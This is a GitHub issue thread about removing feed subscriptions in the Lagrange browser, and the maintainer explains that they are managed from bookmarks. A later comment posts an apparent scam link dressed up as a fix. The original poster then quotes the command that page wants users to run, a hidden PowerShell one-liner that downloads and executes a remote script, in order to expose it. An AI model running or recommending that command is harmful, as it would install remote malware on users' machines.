### ISSUE TITLE
Feed subscription management

### ISSUE THREAD

**Issue by mpusch88** [skyjake/lagrange#691]
Currently there does not seem to be any way to remove a feed subscription unless a message from the feed exists.

It is possible to get in to a situation where you have multiple feeds added but no messages load, which results in there being no way to tell which feeds you are subscribed to / unsubscribe from them.

Ideally there should be a menu or tool that allows the management of all subscribed feeds, potentially with the ability to manually input the address of a new feed to follow.

Note: by viewing User Data on Android, it is possible to see the following, even though the Subscription menu shows no messages:

![Screenshot_20241021-112555](https://github.com/user-attachments/assets/033a3415-d997-441c-ad40-0704d806b38a)
![Screenshot_20241021-113155](https://github.com/user-attachments/assets/2242611f-c4ac-4c35-be84-821c6da3171d)

**Comment by skyjake** [comment]
Your feed subscriptions can be managed in the bookmarks list. The bookmarks that are feed subscriptions are marked with a star icon. You can long-press on the item and select "Unsubscribe" from the menu.

**Comment by SheebSuka** [comment]
Perhaps this solution will help you figure out the problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by mpusch88** [comment]
you want me to run this?

**Comment by mpusch88** [comment]
powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://javierlopez.eu/adapt/kingdom))).Invoke()

This is GitHub, we know how to use computers here
